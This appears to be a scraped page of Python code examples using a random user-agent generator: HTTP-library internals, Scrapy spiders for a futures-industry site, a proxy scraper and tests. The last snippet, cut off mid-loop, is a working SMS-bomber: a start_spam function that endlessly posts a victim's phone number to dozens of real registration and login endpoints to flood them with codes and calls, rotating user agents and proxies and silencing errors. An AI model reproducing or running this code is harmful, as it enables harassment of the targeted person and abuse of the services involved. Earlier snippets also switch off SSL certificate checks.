                with open(grab.config["user_agent_file"]) as inf:
                    lines = inf.read().splitlines()
                grab.config["user_agent"] = random.choice(lines)
            else:
                grab.config["user_agent"] = generate_user_agent()

        # If value is None then set empty string
        # None is not acceptable because in such case
        # pycurl will set its default user agent "PycURL/x.xx.x"
        if not grab.config["user_agent"]:
            grab.config["user_agent"] = ""

        self.curl.setopt(pycurl.USERAGENT, grab.config["user_agent"])

        if grab.config["debug"]:
            self.curl.setopt(pycurl.VERBOSE, 1)
            self.curl.setopt(pycurl.DEBUGFUNCTION, self.debug_processor)

        # Ignore SSL errors
        self.curl.setopt(pycurl.SSL_VERIFYPEER, 0)
        self.curl.setopt(pycurl.SSL_VERIFYHOST, 0)

        # Disabled to avoid SSL3_READ_BYTES:sslv3 alert handshake failure error
        # self.curl.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3)

        if grab.request_method in ("POST", "PUT"):
            if grab.config["post"] is None and grab.config["multipart_post"] is None:
                raise GrabMisuseError(
                    "Neither `post` or `multipart_post`"
                    " options was specified for the %s"
                    " request" % grab.request_method
                )

        if grab.request_method == "POST":
            self.curl.setopt(pycurl.POST, 1)
            if grab.config["multipart_post"]:
                if isinstance(grab.config["multipart_post"], six.string_types):
                    raise error.GrabMisuseError("multipart_post option could not be a string")
                post_items = normalize_http_values(
                    grab.config["multipart_post"],
                    charset=grab.config["charset"],
                    ignore_classes=(UploadFile, UploadContent),
                )
                # py3 hack
                if six.PY3:
                    post_items = decode_pairs(post_items, grab.config["charset"])
                # import pdb; pdb.set_trace()
                self.curl.setopt(pycurl.HTTPPOST, process_upload_items(post_items))
            elif grab.config["post"]:
                post_data = normalize_post_data(grab.config["post"], grab.config["charset"])
                # py3 hack
                # if six.PY3:
                #    post_data = smart_unicode(post_data,
                #                              grab.config['charset'])
                self.curl.setopt(pycurl.POSTFIELDS, post_data)
            else:
                self.curl.setopt(pycurl.POSTFIELDS, "")
        elif grab.request_method == "PUT":
            data = grab.config["post"]
            if isinstance(data, six.text_type):
                # py3 hack
                # if six.PY3:
                #    data = data.encode('utf-8')
                # else:
                raise error.GrabMisuseError("Value of post option could be only " "byte string if PUT method is used")
            self.curl.setopt(pycurl.UPLOAD, 1)
            self.curl.setopt(pycurl.CUSTOMREQUEST, "PUT")
            self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read)
            self.curl.setopt(pycurl.INFILESIZE, len(data))
        elif grab.request_method == "PATCH":
            data = grab.config["post"]
            if isinstance(data, six.text_type):
                raise error.GrabMisuseError("Value of post option could be only byte " "string if PATCH method is used")
            self.curl.setopt(pycurl.UPLOAD, 1)
            self.curl.setopt(pycurl.CUSTOMREQUEST, "PATCH")
            self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read)
            self.curl.setopt(pycurl.INFILESIZE, len(data))
        elif grab.request_method == "DELETE":
            self.curl.setopt(pycurl.CUSTOMREQUEST, "DELETE")
        elif grab.request_method == "HEAD":
            self.curl.setopt(pycurl.NOBODY, 1)
        elif grab.request_method == "UPLOAD":
            self.curl.setopt(pycurl.UPLOAD, 1)
        elif grab.request_method == "GET":
            self.curl.setopt(pycurl.HTTPGET, 1)
        elif grab.request_method == "OPTIONS":
            data = grab.config["post"]
            if data is not None:
                if isinstance(data, six.text_type):
                    raise error.GrabMisuseError(
                        "Value of post option could be only byte " "string if PATCH method is used"
                    )
                self.curl.setopt(pycurl.UPLOAD, 1)
                self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read)
                self.curl.setopt(pycurl.INFILESIZE, len(data))
            self.curl.setopt(pycurl.CUSTOMREQUEST, "OPTIONS")
        else:
            raise error.GrabMisuseError("Invalid method: %s" % grab.request_method)

        headers = grab.config["common_headers"]
        if grab.config["headers"]:
            headers.update(grab.config["headers"])
        # This is required to avoid some problems
        headers.update({"Expect": ""})
        header_tuples = [str("%s: %s" % x) for x in headers.items()]
        self.curl.setopt(pycurl.HTTPHEADER, header_tuples)

        self.process_cookie_options(grab, request_url)

        if grab.config["referer"]:
            self.curl.setopt(pycurl.REFERER, str(grab.config["referer"]))

        if grab.config["proxy"]:
            self.curl.setopt(pycurl.PROXY, str(grab.config["proxy"]))
        else:
            self.curl.setopt(pycurl.PROXY, "")

        if grab.config["proxy_userpwd"]:
            self.curl.setopt(pycurl.PROXYUSERPWD, str(grab.config["proxy_userpwd"]))

        if grab.config["proxy_type"]:
            key = "PROXYTYPE_%s" % grab.config["proxy_type"].upper()
            self.curl.setopt(pycurl.PROXYTYPE, getattr(pycurl, key))

        if grab.config["encoding"]:
            if "gzip" in grab.config["encoding"] and "zlib" not in pycurl.version:
                raise error.GrabMisuseError(
                    "You can not use gzip encoding because " "pycurl was built without zlib support"
                )
            self.curl.setopt(pycurl.ENCODING, grab.config["encoding"])

        if grab.config["userpwd"]:
            self.curl.setopt(pycurl.USERPWD, str(grab.config["userpwd"]))

        if grab.config.get("interface") is not None:
            self.curl.setopt(pycurl.INTERFACE, grab.config["interface"])

        if grab.config.get("reject_file_size") is not None:
            self.curl.setopt(pycurl.MAXFILESIZE, grab.config["reject_file_size"])
Beispiel #41
0
def get_html(url):
    sleep(1)
    headers = {'Accept': '*/*', 'User-Agent': generate_user_agent()}
    response = requests.get(url, headers=headers)
    return response.text
Beispiel #42
0
# -*- coding: utf-8 -*-
from user_agent import generate_user_agent

BOT_NAME = 'comentariosg1'

SPIDER_MODULES = ['comentariosg1.spiders']
NEWSPIDER_MODULE = 'comentariosg1.spiders'

USER_AGENT = generate_user_agent(device_type=['desktop'])

# Obey robots.txt rules
ROBOTSTXT_OBEY = True

FEED_EXPORT_ENCODING = 'utf-8'
Beispiel #43
0
 def test_mac_chrome(self):
     for x in range(100):
         ua = generate_user_agent(platform='mac', navigator='chrome')
         self.assertTrue(re.search(r'OS X \d+_\d+(_\d+\b|\b)', ua))
Beispiel #44
0
    def process_config(self, grab):
        req = Request(data=None)

        try:
            request_url = normalize_url(grab.config['url'])
        except Exception as ex:
            raise error.GrabInvalidUrl(u'%s: %s' %
                                       (six.text_type(ex), grab.config['url']))
        req.url = request_url

        method = grab.detect_request_method()
        req.method = make_str(method)

        req.config_body_maxsize = grab.config['body_maxsize']
        req.config_nobody = grab.config['nobody']

        req.timeout = grab.config['timeout']
        req.connect_timeout = grab.config['connect_timeout']

        extra_headers = {}

        # Body processing
        if grab.config['body_inmemory']:
            pass
        else:
            if not grab.config['body_storage_dir']:
                raise GrabMisuseError('Option body_storage_dir is not defined')
            file_, path_ = self.setup_body_file(
                grab.config['body_storage_dir'],
                grab.config['body_storage_filename'],
                create_dir=grab.config['body_storage_create_dir'])
            req.response_file = file_
            req.response_path = path_

        if grab.config['multipart_post'] is not None:
            post_data = grab.config['multipart_post']
            if isinstance(post_data, six.binary_type):
                pass
            elif isinstance(post_data, six.text_type):
                raise GrabMisuseError('Option multipart_post data'
                                      ' does not accept unicode.')
            else:
                post_items = normalize_http_values(
                    grab.config['multipart_post'],
                    charset=grab.config['charset'],
                    ignore_classes=(UploadFile, UploadContent),
                )
                post_items = decode_pairs(post_items, grab.config['charset'])
                post_items = process_upload_items(post_items)
                post_data, content_type = encode_multipart_formdata(post_items)
                extra_headers['Content-Type'] = content_type
            extra_headers['Content-Length'] = len(post_data)
            req.data = post_data
        elif grab.config['post'] is not None:
            post_data = normalize_post_data(grab.config['post'],
                                            grab.config['charset'])
            # py3 hack
            # if six.PY3:
            #    post_data = smart_unicode(post_data,
            #                              grab.config['charset'])
            extra_headers['Content-Length'] = len(post_data)
            req.data = post_data

        if method in ('POST', 'PUT'):
            if (grab.config['post'] is None
                    and grab.config['multipart_post'] is None):
                raise GrabMisuseError('Neither `post` or `multipart_post`'
                                      ' options was specified for the %s'
                                      ' request' % method)
        # Proxy
        if grab.config['proxy']:
            req.proxy = grab.config['proxy']

        if grab.config['proxy_userpwd']:
            req.proxy_userpwd = grab.config['proxy_userpwd']

        if grab.config['proxy_type']:
            req.proxy_type = grab.config['proxy_type']
        else:
            req.proxy_type = 'http'

        # User-Agent
        if grab.config['user_agent'] is None:
            if grab.config['user_agent_file'] is not None:
                with open(grab.config['user_agent_file']) as inf:
                    lines = inf.read().splitlines()
                grab.config['user_agent'] = random.choice(lines)
            else:
                grab.config['user_agent'] = generate_user_agent()

        extra_headers['User-Agent'] = grab.config['user_agent']

        # Headers
        headers = extra_headers
        headers.update(grab.config['common_headers'])

        if grab.config['headers']:
            headers.update(grab.config['headers'])
        req.headers = headers

        # Cookies
        self.process_cookie_options(grab, req)

        self._request = req
Beispiel #45
0
 def test_navigator_option_tuple(self):
     for x in range(100):
         ua = generate_user_agent(navigator=('chrome', ))
         ua = generate_user_agent(navigator=('chrome', 'firefox'))
         ua = generate_user_agent(navigator=('chrome', 'firefox', 'ie'))
Beispiel #46
0
    def infoParse(self, response):
        item = CfachinaItem()
        currentPage = response.meta['currentPage']
        organid = response.meta['organid']
        callbacks = response.meta['callbacks']
        selectType = response.meta['selectType']
        #第一页时,获取全局totalPage
        if currentPage == 1:
            totalPage = response.xpath(
                '//li[text()="共["]/span/text()').extract_first()
            totalPage = int(
                totalPage) if totalPage and totalPage.isdigit() else None
        #非第一页时,从meta里获取全局totalPage
        else:

            totalPage = response.meta['totalPage']
        configs = Con.main(response.url)
        if configs['list']['v'] is not '':
            res = S.select_content(response, configs['list'])
        else:
            res = [response]
        #res可能为None,若非None,则parse数据
        if res is not None:
            for info in res:
                result = dict()
                for config in configs['data']:
                    k = config['En']
                    result[k] = S.select_content(info, config)
                    result[k] = S.replace_all(result[k])

    #            print(result)
                item['result'] = result
                item['keys'] = configs['list']['keys']
                item['db'] = configs['list']['db']
                yield item
        #根据类和totalPage判断是否还有下一页,有就继续request nextpage
        if isinstance(totalPage, int) and currentPage < totalPage / 20:
            currentPage += 1
            data = {
                'organid': organid,
                'currentPage': str(currentPage),
                'pageSize': '20',
                'selectType': selectType
            }
            url = 'http://www.cfachina.org/cfainfo/organbaseinfoOneServlet?' + urllib.parse.urlencode(
                data)
            yield scrapy.Request(
                url,
                callback=eval(callbacks),
                headers={
                    'User-Agent':
                    generate_user_agent(os=('win', 'mac', 'linux'))
                },
                meta={
                    'currentPage': currentPage,
                    'totalPage': totalPage,
                    'organid': organid,
                    'callbacks': callbacks,
                    'selectType': selectType
                },
            )
Beispiel #47
0
def random_user_agent():
    global header
    header['User-Agent'] = generate_user_agent()
Beispiel #48
0
    def cdfQualificationListparse(self, response):
        """从业资格信息"""
        #        '''保存为本地html'''
        #        print(response.text)
        #        with open("1.html","wb") as f:
        #            f.write(response.body)
        if self.page == 1:
            self.cdfQualificationListTotalPages = int(
                response.xpath('//ul[@class="yema"]/li[last()]/span/text()').
                extract_first())
        currentPage = 1
        for info in response.xpath(
                '//td[text()=" 机构编号 "]/parent::tr/following-sibling::tr'):
            #获取机构编号,构造九表url
            organid = info.xpath('td[1]/text()').extract_first()
            #构造url
            #资管业务--暂时未写逻辑
            #            data_ = {'organid':organid}
            #            yield scrapy.Request('http://www.cfachina.org/cfainfo/personOfAssetmanageinfoServlet?'+urllib.parse.urlencode(data_),
            #                                 meta = {'organid':organid},
            #                                 callback = self.infoParse1,
            #                                 headers = {'User-Agent':generate_user_agent(os=('win','mac','linux'))}
            #                                 )
            for selecttype in [{
                    't': 'organbaseinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'organhisinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'organbranchinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'supervisorinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'personinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'organshareholderinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'organcreditinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'organfinancialinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'subdebtmonthinfo',
                    'callback': 'self.infoParse'
            }]:
                #urlencode生成method:get url
                data = {
                    'organid': organid,
                    'currentPage': str(currentPage),
                    'pageSize': '20',
                    'selectType': selecttype['t']
                }
                url = 'http://www.cfachina.org/cfainfo/organbaseinfoOneServlet?' + urllib.parse.urlencode(
                    data)
                callbacks = selecttype['callback']
                selectType = selecttype['t']
                #发送url request
                yield scrapy.Request(url,
                                     meta={
                                         'currentPage': currentPage,
                                         'organid': organid,
                                         'callbacks': callbacks,
                                         'selectType': selectType
                                     },
                                     callback=eval(callbacks),
                                     headers={
                                         'User-Agent':
                                         generate_user_agent(os=('win', 'mac',
                                                                 'linux'))
                                     })

        if self.page < self.cdfQualificationListTotalPages:
            self.page += 1
            nextdata = self.madedata(self.page)
            nextheaders = {'User-Agent': generate_user_agent()}
            nexturl = 'http://www.cfachina.org/cfainfo/organbaseinfoServlet'
            yield scrapy.FormRequest(nexturl,
                                     method='POST',
                                     formdata=nextdata,
                                     headers=nextheaders,
                                     callback=self.cdfQualificationListparse)
Beispiel #49
0
import json
import os
import re
import time
from multiprocessing import Lock, Pool, Process, RLock

import requests
import user_agent
from requests.exceptions import RequestException

filename = 'result.txt'
file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), filename)

headers = {'user-agent': user_agent.generate_user_agent()}


def get_one_page(url):
    try:
        resp = requests.get(url, headers=headers)
        if resp.status_code == 200:
            print("Download-Success {}".format(url))
            return resp.text
        return None
    except RequestException:
        print("Download-Failed {}".format(url))
        return None


def parse_one_page(html):
    pattern = re.compile(
        '<dd>.*?board-index.*?>(\d+)</i>.*?' + 'data-src="(.*?)".*?' +
Beispiel #50
0
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))


from SpiderHelp import SpiderHelp
from RedisHelp import _Request,_RedisSpider,logger


conn_flag = False
REDISFLAG = True
TODAY = time.strftime('%Y-%m-%d')
Headers = {'User-Agent': generate_user_agent(os=('win',))}
Cookies = {'.ASPXANONYMOUS':'pdtC5gfC0wEkAAAAOWIzZDNiMGEtYjUzOS00YzYyLWEyZTctNWM2OTdmOGM2ZDcz0'}
MAX = 2**15


def get_area():
    res = requests.get('http://js.51jobcdn.com/in/js/2016/layer/area_array_c.js?20171103')
    RESULT = json.loads(re.compile('area=(\{.*?\})',re.S).search(res.text).group(1))
    return RESULT



class SinaspiderSpider(_RedisSpider, SpiderHelp):  #,scrapy.Spider
    name = '51job_test'
    start_urls = get_area()
    state = {}
Beispiel #51
0
import json
import logging
import time
from datetime import datetime as dt
from typing import Set

import brotli
import requests
from bs4 import BeautifulSoup
from user_agent import generate_user_agent

from .tools.proxies_manipulation import parse_proxies, short_url

logger = logging.getLogger(__name__)
standard_headers = {"User-Agent": generate_user_agent()}
timeout = 6


def proxy50_50() -> Set[str]:
    url = "https://proxy50-50.blogspot.com/"
    proxies_set = set()
    try:
        r = requests.get(url, headers=standard_headers, timeout=timeout)
        proxies_set.update(parse_proxies(r.text))
        logger.info(
            f"From {short_url(r.url)} were parsed {len(proxies_set)} proxies")
    except Exception:
        logger.exception(f"Proxies from {short_url(url)} were not loaded :(")
    return proxies_set

Beispiel #52
0
def start_spam(phone):
    def format_phone(phone, phone_mask):
        phone_list = list(phone)
        for i in phone_list:
            phone_mask = phone_mask.replace("#", i, 1)
        return phone_mask

    name = ""
    for _ in range(12):
        name = name + choice(
            "123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM")
        password = name + choice(
            "123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM")
        email = name + "@gmail.com"
    phone9 = phone[1:]
    headers = {"User-Agent": generate_user_agent()}
    proxies = generate_proxy()
    while True:
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://zoloto585.ru/api/bcard/reg/",
                 json={
                     "name": "",
                     "surname": "",
                     "patronymic": "",
                     "sex": "m",
                     "birthdate": "..",
                     "phone": formatted_phone,
                     "email": "",
                     "city": ""
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone[1:], "8(###)###-##-##")
            post(
                "http://xn---72-5cdaa0cclp5fkp4ewc.xn--p1ai/user_account/ajax222.php?do=sms_code",
                data={"phone": formatted_phone},
                headers=headers)
        except:
            pass
        try:
            post("https://youla.ru/web-api/auth/request_code",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://yaponchik.net/login/login.php",
                 data={
                     "login": "******",
                     "countdown": "0",
                     "step": "phone",
                     "redirect": "/profile/",
                     "phone": formatted_phone,
                     "code": ""
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://eda.yandex/api/v1/user/request_authentication_code",
                 json={"phone_number": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.iconjob.co/api/auth/verification_code",
                 json={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://cabinet.wi-fi.ru/api/auth/by-sms",
                 data={"msisdn": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://ng-api.webbankir.com/user/v2/create",
                 json={
                     "lastName": "иванов",
                     "firstName": "иван",
                     "middleName": "иванович",
                     "mobilePhone": phone,
                     "email": email,
                     "smsCode": ""
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://shop.vsk.ru/ajax/auth/postSms/",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://passport.twitch.tv/register?trusted_request=true",
                 json={
                     "birthday": {
                         "day": 11,
                         "month": 11,
                         "year": 1999
                     },
                     "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp",
                     "include_verification_code": True,
                     "password": password,
                     "phone_number": phone,
                     "username": name
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://b.utair.ru/api/v1/login/",
                 json={
                     "login": phone,
                     "confirmation_type": "call_code"
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "#(###)###-##-##")
            post("https://www.r-ulybka.ru/login/form_ajax.php",
                 data={
                     "action": "auth",
                     "phone": formatted_phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://uklon.com.ua/api/v1/account/code/send",
                 headers={
                     "client_id": "6289de851fc726f887af8d5d7a56c635",
                     "User-Agent": generate_user_agent()
                 },
                 json={"phone": phone})
        except:
            pass
        try:
            post("https://partner.uklon.com.ua/api/v1/registration/sendcode",
                 headers={
                     "client_id": "6289de851fc726f887af8d5d7a56c635",
                     "User-Agent": generate_user_agent()
                 },
                 json={"phone": phone})
        except:
            pass
        try:
            post("https://secure.ubki.ua/b2_api_xml/ubki/auth",
                 json={
                     "doc": {
                         "auth": {
                             "mphone": "+" + phone,
                             "bdate": "11.11.1999",
                             "deviceid": "00100",
                             "version": "1.0",
                             "source": "site",
                             "signature": "undefined"
                         }
                     }
                 },
                 headers={
                     "Accept": "application/json",
                     "User-Agent": generate_user_agent()
                 })
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://www.top-shop.ru/login/loginByPhone/",
                 data={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "8(###)###-##-##")
            post("https://topbladebar.ru/user_account/ajax222.php?do=sms_code",
                 data={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru",
                data={"phone_number": phone},
                headers=headers)
        except:
            pass
        try:
            post("https://m.tiktok.com/node-a/send/download_link",
                 json={
                     "slideVerify": 0,
                     "language": "ru",
                     "PhoneRegionCode": "7",
                     "Mobile": phone9,
                     "page": {
                         "pageName": "home",
                         "launchMode": "direct",
                         "trafficType": ""
                     }
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://thehive.pro/auth/signup",
                 json={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post(f"https://msk.tele2.ru/api/validation/number/{phone}",
                 json={"sender": "Tele2"},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ### - ## - ##")
            post("https://www.taxi-ritm.ru/ajax/ppp/ppp_back_call.php",
                 data={
                     "RECALL": "Y",
                     "BACK_CALL_PHONE": formatted_phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.tarantino-family.com/wp-admin/admin-ajax.php",
                 data={
                     "action": "callback_phonenumber",
                     "phone": phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://lk.tabris.ru/reg/",
                 data={
                     "action": "phone",
                     "phone": phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://tabasko.su/",
                 data={
                     "IS_AJAX": "Y",
                     "COMPONENT_NAME": "AUTH",
                     "ACTION": "GET_CODE",
                     "LOGIN": phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.sushi-profi.ru/api/order/order-call/",
                 json={
                     "phone": phone9,
                     "name": name
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://client-api.sushi-master.ru/api/v1/auth/init",
                 json={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "8(###)###-##-##")
            post(
                "https://xn--80aaispoxqe9b.xn--p1ai/user_account/ajax.php?do=sms_code",
                data={"phone": formatted_phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "8 (###) ###-##-##")
            post("http://sushigourmet.ru/auth",
                 data={
                     "phone": formatted_phone,
                     "stage": 1
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://sushifuji.ru/sms_send_ajax.php",
                 data={
                     "name": "false",
                     "phone": phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://api.sunlight.net/v3/customers/authorization/",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            get("https://suandshi.ru/mobile_api/register_mobile_user",
                params={"phone": phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "8-###-###-##-##")
            post("https://pizzasushiwok.ru/index.php",
                 data={
                     "mod_name": "registration",
                     "tpl": "restore_password",
                     "phone": formatted_phone
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://www.sportmaster.ua/",
                params={
                    "module": "users",
                    "action": "SendSMSReg",
                    "phone": phone
                },
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            get("https://www.sportmaster.ru/user/session/sendSmsCode.do",
                params={"phone": formatted_phone},
                headers=headers)
        except:
            pass
        try:
            post(
                "https://www.sms4b.ru/bitrix/components/sms4b/sms.demo/ajax.php",
                data={
                    "demo_number": "+" + phone,
                    "ajax_demo_send": "1"
                },
                headers=headers)
        except:
            pass
        try:
            post("https://smart.space/api/users/request_confirmation_code/",
                 json={
                     "mobile": "+" + phone,
                     "action": "confirm_mobile"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://shopandshow.ru/sms/password-request/",
                 data={
                     "phone": "+" + phone,
                     "resend": 0
                 },
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://shafa.ua/api/v3/graphiql",
                json={
                    "operationName":
                    "RegistrationSendSms",
                    "variables": {
                        "phoneNumber": "+" + phone
                    },
                    "query":
                    "mutation RegistrationSendSms($phoneNumber: String!) {\n  unauthorizedSendSms(phoneNumber: $phoneNumber) {\n    isSuccess\n    userToken\n    errors {\n      field\n      messages {\n        message\n        code\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n"
                },
                headers=headers)
        except:
            pass
        try:
            post(
                "https://shafa.ua/api/v3/graphiql",
                json={
                    "operationName":
                    "sendResetPasswordSms",
                    "variables": {
                        "phoneNumber": "+" + phone
                    },
                    "query":
                    "mutation sendResetPasswordSms($phoneNumber: String!) {\n  resetPasswordSendSms(phoneNumber: $phoneNumber) {\n    isSuccess\n    userToken\n    errors {\n      ...errorsData\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment errorsData on GraphResponseError {\n  field\n  messages {\n    code\n    message\n    __typename\n  }\n  __typename\n}\n"
                },
                headers=headers)
        except:
            pass
        try:
            post("https://sayoris.ru/?route=parse/whats",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.saurisushi.ru/Sauri/api/v2/auth/login",
                 data={
                     "data": {
                         "login": phone9,
                         "check": True,
                         "crypto": {
                             "captcha": "739699"
                         }
                     }
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://pass.rutube.ru/api/accounts/phone/send-password/",
                 json={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://rutaxi.ru/ajax_auth.html",
                 data={
                     "l": phone9,
                     "c": "3"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://rieltor.ua/api/users/register-sms/",
                 json={
                     "phone": phone,
                     "retry": 0
                 },
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://richfamily.ru/ajax/sms_activities/sms_validate_phone.php",
                data={"phone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+#(###)###-##-##")
            post("https://www.rendez-vous.ru/ajax/SendPhoneConfirmationNew/",
                 data={
                     "phone": formatted_phone,
                     "alien": "0"
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://oapi.raiffeisen.ru/api/sms-auth/public/v1.0/phone/code",
                params={"number": phone},
                headers=headers)
        except:
            pass
        try:
            post("https://qlean.ru/clients-api/v2/sms_codes/auth/request_code",
                 json={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+#-###-###-##-##")
            post("https://api.pozichka.ua/v1/registration/send",
                 json={"RegisterSendForm": {
                     "phone": formatted_phone
                 }},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post(
                "https://pliskov.ru/Cube.MoneyRent.Orchard.RentRequest/PhoneConfirmation/SendCode",
                data={"phone": formatted_phone},
                headers=headers)
        except:
            pass
        try:
            get("https://cabinet.planetakino.ua/service/sms",
                params={"phone": phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "8-###-###-##-##")
            post("https://pizzasushiwok.ru/index.php",
                 data={
                     "mod_name": "call_me",
                     "task": "request_call",
                     "name": name,
                     "phone": formatted_phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://pizzasinizza.ru/api/phoneCode.php",
                 json={"phone": phone9},
                 headers=headers)
        except:
            pass
        try:
            post("https://pizzakazan.com/auth/ajax.php",
                 data={
                     "phone": "+" + phone,
                     "method": "sendCode"
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-####")
            post("https://pizza46.ru/ajaxGet.php",
                 data={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://piroginomerodin.ru/index.php?route=sms/login/sendreg",
                data={"telephone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+#-###-###-##-##")
            post("https://paylate.ru/registry",
                 data={
                     "mobile": formatted_phone,
                     "first_name": name,
                     "last_name": name,
                     "nick_name": name,
                     "gender-client": 1,
                     "email": email,
                     "action": "registry"
                 },
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://www.panpizza.ru/index.php?route=account/customer/sendSMSCode",
                data={"telephone": "8" + phone9},
                headers=headers)
        except:
            pass
        try:
            post("https://www.ozon.ru/api/composer-api.bx/_action/fastEntry",
                 json={
                     "phone": phone,
                     "otpId": 0
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-####")
            post("https://www.osaka161.ru/local/tools/webstroy.webservice.php",
                 data={
                     "name": "Auth.SendPassword",
                     "params[0]": formatted_phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://ontaxi.com.ua/api/v2/web/client",
                 json={
                     "country": "UA",
                     "phone": phone[3:]
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://secure.online.ua/ajax/check_phone/",
                params={"reg_phone": phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "8 (###) ###-##-##")
            get("https://okeansushi.ru/includes/contact.php",
                params={
                    "call_mail": "1",
                    "ajax": "1",
                    "name": name,
                    "phone": formatted_phone,
                    "call_time": "1",
                    "pravila2": "on"
                },
                headers=headers)
        except:
            pass
        try:
            post(
                "https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone",
                data={"st.r.phone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            post("https://nn-card.ru/api/1.0/covid/login",
                 json={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://www.nl.ua",
                 data={
                     "component": "bxmaker.authuserphone.login",
                     "sessid": "bf70db951f54b837748f69b75a61deb4",
                     "method": "sendCode",
                     "phone": phone,
                     "registration": "N"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.niyama.ru/ajax/sendSMS.php",
                 data={
                     "REGISTER[PERSONAL_PHONE]": phone,
                     "code": "",
                     "sendsms": "Выслать код"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://account.my.games/signup_send_sms/",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://auth.multiplex.ua/login",
                 json={"login": phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://prod.tvh.mts.ru/tvh-public-api-gateway/public/rest/general/send-code",
                params={"msisdn": phone},
                headers=headers)
        except:
            pass
        try:
            post("https://www.moyo.ua/identity/registration",
                 data={
                     "firstname": name,
                     "phone": phone,
                     "email": email
                 },
                 headers=headers)
        except:
            pass
        try:
